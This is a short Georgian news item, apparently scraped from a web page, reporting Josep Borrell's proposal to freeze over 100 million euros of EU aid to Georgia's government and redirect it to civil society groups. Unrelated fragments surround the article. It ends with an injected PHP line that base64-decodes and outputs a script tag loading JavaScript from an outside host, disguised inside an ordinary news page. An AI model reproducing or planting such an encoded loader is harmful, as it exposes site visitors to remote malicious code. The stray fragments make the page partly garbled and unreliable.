celsiusi
ავერსი შნაიდერი

 ევროკავშირიდან 100 მლნ ევროზე მეტი თანხა გაიყინება და მთავრობის ნაცვლად NGO-ებს მოხმარდება - ამის შესახებ ევროკავშირის უმაღლესმა წარმომადგენელმა საგარეო საქმეთა და უსაფრთხოების პოლიტიკის საკითხებში ჯოზეფ ბორელმა დღეს ჟურნალისტებთან საქართველოს საკითხზე ისაუბრა.

ბორელი დღეს, 18 ნოემბერს, ბრიუსელში დაგეგმილ სხდომას გაუძღვება, სადაც საქართველოს საკითხსაც განიხილავენ. როგორც ამბობ, ის მხარს დაუჭერს მთავრობას მთავრობისთვის დაფინანსების შეჩერებას და მის გადამისამართებას არასამთავრობო ორგანიზაციებზე.

"კონკრეტული გადაწყვეტილებები მიიღება. ჩემი წინადადება იქნება შეჩერდეს პროგრამების მნიშვნელოვანი ნაწილის მხარდაჭერა, რომელიც მთავრობას გადაეცემა. 100 მლნ ევროზე მეტი გაყინული იქნება. ნაცვლად მთავრობისა ეს თანხა გამოეყოფა სამოქალაქო საზოგადოებას. ასე რომ ავიღებთ ამ თანხას, დაახლოებით 100 მლნ ევროს და მივცემთ სამოქალაქო საზოგადოების ორგანიზაციების. იმისთვის, რომ დავეხმაროთ მათ სამართლიანი არჩევნებისთვის ბრძოლაში. ქართველ ხალხს ევროკავშირისგან გრძელვადიანი მხარდაჭერა ექნება", - ამბობს ბორელი და ამატებს, რომ ევროინტეგრაციის პროცესი შეჩერებულია, სანამ მთავრობა არ დაუბრუნდება ევროპულ კურსს.

80
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");